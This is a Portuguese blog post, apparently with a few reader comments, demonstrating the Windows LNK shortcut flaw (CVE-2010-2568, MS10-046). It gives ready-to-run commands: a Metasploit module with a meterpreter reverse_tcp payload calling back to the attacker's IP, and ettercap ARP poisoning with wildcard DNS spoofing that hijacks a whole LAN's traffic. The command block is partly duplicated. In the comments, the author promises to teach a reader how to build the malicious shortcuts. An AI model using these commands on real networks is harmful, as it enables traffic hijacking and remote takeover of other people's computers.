Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.
Maiores informações em:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx
O que eu fiz?
Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo um MITM, e direcionando todo trafego da minha rede local para minha maquina.
Comandos:
use windows/browser/ms10_046_shortcut_icon_dllloader
set LHOST 192.168.1.4
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //
Sobre o Vídeo:
Formato: AVI
Tamanho: 12.6 MB
Duração: 4:45 min
Autor: Fabiano Matias aka Bhior
Musica: Cachimbo da paz - Gabriel o Pensador
Baixar: http://www.4shared.com/file/MzP5k2eD/Windows_LNK_CVE-2010-2568.html
Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568
http://www.osvdb.org/66387
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx
http://adrenaline.com.br/seguranca/noticias/5616/criminosos-exploram-icones-de-atalhos-para-espalhar-malware.html
Muito bom bhior ,
ResponderExcluirumas pergunta ..
como fazer esses atalhos que vc diz ( fabiano.LNK ou fabiano.PIF )
no aguardo...
by user777
@tela,
ResponderExcluirSim,
Para sua segunda pergunta, vou fazer a aula.
Abraços
Valeu bhior no aguardo...
ResponderExcluirBy user777